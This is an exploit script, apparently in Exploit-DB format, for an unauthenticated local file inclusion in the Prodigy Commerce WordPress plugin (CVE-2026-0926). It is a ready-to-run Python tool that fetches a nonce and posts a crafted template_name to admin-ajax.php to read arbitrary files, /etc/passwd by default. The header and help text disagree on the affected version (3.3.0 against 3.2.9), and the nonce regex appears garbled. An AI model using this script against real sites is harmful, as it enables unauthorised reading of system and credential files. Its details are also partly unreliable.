Prodigy Commerce 3.3.0 – Local File Inclusion

# Exploit Title: Prodigy Commerce  3.3.0 - Local File Inclusion 
# Date: 23-05-2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://prodigycommerce.com/
# Software Link: https://wordpress.org/plugins/prodigy-commerce/
# Version: 3.2.9
# Tested on: Debian
# CVE : CVE-2026-0926
# Description: Prodigy Commerce WordPress plugin <= 3.2.9 contains a local file inclusion caused by improper sanitization of 'parameters[template_name]' parameter, letting unauthenticated attackers include and execute arbitrary files remotely.


import httpx
import asyncio
import re
from urllib.parse import urljoin
import argparse


def get_nonce(base_url):
    with httpx.Client(verify=False) as client:
        r = client.get(url=base_url)
        match = re.search(r'var settingss*=s*{[^}]*"nonce":"([^"]+)"', r.text)
        if match:
            nonce = match.group(1)
            return nonce
        else:
            print("Nonce not found")

async def main(base_url,file):
    async with httpx.AsyncClient(verify=False) as client:
        nonce = get_nonce(base_url)
        data = {
            "action": "prodigy-render-my-account-widget",
            "nonce": nonce,
            "parameters[template_name]": file,
            "parameters[default_path]": "/"
        }

        url = urljoin(base_url, '/wp-admin/admin-ajax.php')
        r = await client.post(url=url, data=data)
        raw = r.json()
        out = raw['data']
        print(out['html'])

parser = argparse.ArgumentParser(description="Prodigy Commerce <= 3.3.0 - Local File Inclusion exploit")
parser.add_argument("-f", "--file", default='/etc/passwd', help="File to read, default: /etc/passwd")
parser.add_argument("-u", "--url", required=True, help="Target url, e.g. http://test.local")
args = parser.parse_args()

asyncio.run(main(args.url, args.file))